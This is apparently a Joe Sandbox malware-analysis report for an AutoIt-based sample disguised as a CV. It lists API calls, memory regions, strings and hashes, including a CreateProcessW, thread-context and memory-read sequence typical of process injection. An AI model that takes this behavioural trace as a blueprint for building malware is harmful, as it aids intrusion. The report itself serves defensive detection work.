                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                            • String ID: TaskbarCreated
                                                                                            • API String ID: 129472671-2362178303

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 000C3E79
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 000C3E88
                                                                                            • LoadIconW.USER32(00000063), ref: 000C3E9E
                                                                                            • LoadIconW.USER32(000000A4), ref: 000C3EB0
                                                                                            • LoadIconW.USER32(000000A2), ref: 000C3EC2
                                                                                              • Part of subcall function 000C4024: LoadImageW.USER32(000C0000,00000063,00000001,00000010,00000010,00000000), ref: 000C4048
                                                                                            • RegisterClassExW.USER32(?), ref: 000C3F30
                                                                                              • Part of subcall function 000C3F53: GetSysColorBrush.USER32(0000000F), ref: 000C3F86
                                                                                              • Part of subcall function 000C3F53: RegisterClassExW.USER32(00000030), ref: 000C3FB0
                                                                                              • Part of subcall function 000C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C3FC1
                                                                                              • Part of subcall function 000C3F53: InitCommonControlsEx.COMCTL32(?), ref: 000C3FDE
                                                                                              • Part of subcall function 000C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C3FEE
                                                                                              • Part of subcall function 000C3F53: LoadIconW.USER32(000000A9), ref: 000C4004
                                                                                              • Part of subcall function 000C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C4013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                            • String ID: #$0$AutoIt v3
                                                                                            • API String ID: 423443420-4155596026

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01B26D71
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01B26F97
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileFreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 204039940-0

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 000C4A1D
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001341DB
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0013421A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00134249
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$CloseOpen
                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                            • API String ID: 1586453840-614718249

                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C36E6
                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3707
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C371B
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C3724
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateShow
                                                                                            • String ID: AutoIt v3$edit

                                                                                             Control-flow Graph
                                                                                             [Graph not preserved. Function at 1b26a90; nodes reference CreateFileW, VirtualAlloc, ReadFile and ExitProcess.]
                                                                                            APIs
                                                                                              • Part of subcall function 01B26980: Sleep.KERNELBASE(000001F4), ref: 01B26991
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01B26B94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileSleep
                                                                                            • String ID: SJZB1TEL46C

                                                                                             Control-flow Graph
                                                                                             [Graph not preserved. Function at c51af; nodes reference LoadStringW and Shell_NotifyIconW.]
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000C522F
                                                                                            • _wcscpy.LIBCMT ref: 000C5283
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C5293
                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00133CB0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                            • String ID: Line:
                                                                                            APIs
                                                                                              • Part of subcall function 000C41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000C39FE,?,00000001), ref: 000C41DB
                                                                                            • _free.LIBCMT ref: 001336B7
                                                                                            • _free.LIBCMT ref: 001336FE
                                                                                              • Part of subcall function 000CC833: __wsplitpath.LIBCMT ref: 000CC93E
                                                                                              • Part of subcall function 000CC833: _wcscpy.LIBCMT ref: 000CC953
                                                                                              • Part of subcall function 000CC833: _wcscat.LIBCMT ref: 000CC968
                                                                                              • Part of subcall function 000CC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 000CC978
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                            APIs
                                                                                              • Part of subcall function 000C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00181148,?,000C61FF,?,00000000,00000001,00000000), ref: 000C5392
                                                                                              • Part of subcall function 000C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 000C4A1D
                                                                                            • _wcscat.LIBCMT ref: 00132D80
                                                                                            • _wcscat.LIBCMT ref: 00132DB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat$FileModuleNameOpen
                                                                                            • String ID: \$\Include\
                                                                                            APIs
                                                                                            • __getstream.LIBCMT ref: 000E34FE
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 000E3539
                                                                                            • __wopenfile.LIBCMT ref: 000E3549
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                            • String ID: <G
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000DD28B,SwapMouseButtons,00000004,?), ref: 000DD2BC
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000DD28B,SwapMouseButtons,00000004,?,?,?,?,000DC865), ref: 000DD2DD
                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,000DD28B,SwapMouseButtons,00000004,?,?,?,?,000DC865), ref: 000DD2FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: Control Panel\Mouse
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01B2613B
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B261D1
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B261F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            APIs
                                                                                              • Part of subcall function 000C4517: _fseek.LIBCMT ref: 000C452F
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C65D
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C670
                                                                                            • _free.LIBCMT ref: 0010C4DD
                                                                                            • _free.LIBCMT ref: 0010C4E4
                                                                                            • _free.LIBCMT ref: 0010C54F
                                                                                              • Part of subcall function 000E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000E7A85), ref: 000E1CB1
                                                                                              • Part of subcall function 000E1C9D: GetLastError.KERNEL32(00000000,?,000E7A85), ref: 000E1CC3
                                                                                            • _free.LIBCMT ref: 0010C557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000DEBB2
                                                                                              • Part of subcall function 000C51AF: _memset.LIBCMT ref: 000C522F
                                                                                              • Part of subcall function 000C51AF: _wcscpy.LIBCMT ref: 000C5283
                                                                                              • Part of subcall function 000C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C5293
                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 000DEC07
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000DEC16
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00133C88
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1378193009-0
                                                                                            • Opcode ID: 7a32032a3fada7082f1ec575f73cbb6e0cfc9db5af483122e445707957e6df37
                                                                                            • Instruction ID: db78fe83371510793911c927a2f892850ea75ab5b05e3ad44cfc93bdcbaaf1a2
                                                                                            • Opcode Fuzzy Hash: 7a32032a3fada7082f1ec575f73cbb6e0cfc9db5af483122e445707957e6df37
                                                                                            • Instruction Fuzzy Hash: B921FC75504784AFE7339724DC55BE7BBEC9B01308F04148EE69E6A242C3742AC5CB55
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00133725
                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0013376F
                                                                                              • Part of subcall function 000C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C53B1,?,?,000C61FF,?,00000000,00000001,00000000), ref: 000C662F
                                                                                              • Part of subcall function 000C40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C40C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                                            • String ID: X
                                                                                            • API String ID: 3777226403-3081909835
                                                                                            • Opcode ID: 79f0d4c27cf0762142e82701147ee3e965bb262d62114de6f2014adefe90cc12
                                                                                            • Instruction ID: b817086bee4d169d1a67a3bca86ed78cd6f548ad0931c7051484072e4aaf71b7
                                                                                            • Opcode Fuzzy Hash: 79f0d4c27cf0762142e82701147ee3e965bb262d62114de6f2014adefe90cc12
                                                                                            • Instruction Fuzzy Hash: E221C371A10298AFCB11DFD4CC45BEEBBF8AF49304F008019E415BB242DBB49A898F65
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0010C72F
                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0010C746
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$FileNamePath
                                                                                            • String ID: aut
                                                                                            • API String ID: 3285503233-3010740371
                                                                                            • Opcode ID: de005a2401656bc193ff685414390fcff80ffef4ff5b75d5b6c381c0688d4e84
                                                                                            • Instruction ID: 436abbfd11241af439a2726c7f2d9a1e6ac566d21cd0e565da302e490ba05959
                                                                                            • Opcode Fuzzy Hash: de005a2401656bc193ff685414390fcff80ffef4ff5b75d5b6c381c0688d4e84
                                                                                            • Instruction Fuzzy Hash: 0CD05E7550030EABDF50ABA0EC0EF8A777C9700708F0001A0B754A50B1DBF0E6D98B55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: baf05aa961ca25ebb1de8cc6be5907119f6ceafdd9720302edb67a95477ffd76
                                                                                            • Instruction ID: dbee1071447e5d18b4ec4a016ce55825f236f0c25d0182f0886a84f2342a4660
                                                                                            • Opcode Fuzzy Hash: baf05aa961ca25ebb1de8cc6be5907119f6ceafdd9720302edb67a95477ffd76
                                                                                            • Instruction Fuzzy Hash: F0F15C716083419FCB14DF24C485BAEB7E5BF88314F14892EF9999B392D770E946CB82
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000C5022
                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C50CB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell__memset
                                                                                            • String ID:
                                                                                            • API String ID: 928536360-0
                                                                                            • Opcode ID: 13bcce80b2810aabe59db8f5acb4836a08b6658c16eea402204fe2c132be70c7
                                                                                            • Instruction ID: bb67edddb4dc1cbe07cf3d72f96e480d0343ab3c1b79d764a22b0c4a961b2479
                                                                                            • Opcode Fuzzy Hash: 13bcce80b2810aabe59db8f5acb4836a08b6658c16eea402204fe2c132be70c7
                                                                                            • Instruction Fuzzy Hash: 3331ACB5504B00DFC720DF24D884B9BBBE8FF48309F10092EF59AC2651E771AA84CB96
                                                                                            APIs
                                                                                            • __FF_MSGBANNER.LIBCMT ref: 000E3973
                                                                                              • Part of subcall function 000E81C2: __NMSG_WRITE.LIBCMT ref: 000E81E9
                                                                                              • Part of subcall function 000E81C2: __NMSG_WRITE.LIBCMT ref: 000E81F3
                                                                                            • __NMSG_WRITE.LIBCMT ref: 000E397A
                                                                                              • Part of subcall function 000E821F: GetModuleFileNameW.KERNEL32(00000000,00180312,00000104,00000000,00000001,00000000), ref: 000E82B1
                                                                                              • Part of subcall function 000E821F: ___crtMessageBoxW.LIBCMT ref: 000E835F
                                                                                              • Part of subcall function 000E1145: ___crtCorExitProcess.LIBCMT ref: 000E114B
                                                                                              • Part of subcall function 000E1145: ExitProcess.KERNEL32 ref: 000E1154
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • RtlAllocateHeap.NTDLL(01910000,00000000,00000001,00000001,00000000,?,?,000DF507,?,0000000E), ref: 000E399F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1372826849-0
                                                                                            • Opcode ID: c047e61742d609d58781618eb028bd45a9fc82a5be26f920c176becfee451db9
                                                                                            • Instruction ID: 2b773fc55aaab2fddccb8fc3eacba6fd9c3e7f0f23ae22bc74ca36455a0a60b2
                                                                                            • Opcode Fuzzy Hash: c047e61742d609d58781618eb028bd45a9fc82a5be26f920c176becfee451db9
                                                                                            • Instruction Fuzzy Hash: B801B9363452819EE6623B27DC4ABAE77D89B81764F211029F509BB693DFB09D404660
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0010C385,?,?,?,?,?,00000004), ref: 0010C6F2
                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0010C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0010C708
                                                                                            • CloseHandle.KERNEL32(00000000,?,0010C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0010C70F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 390f4851d8416438a35ea92cde3cc301b1221238438242006e58992a0643ed91
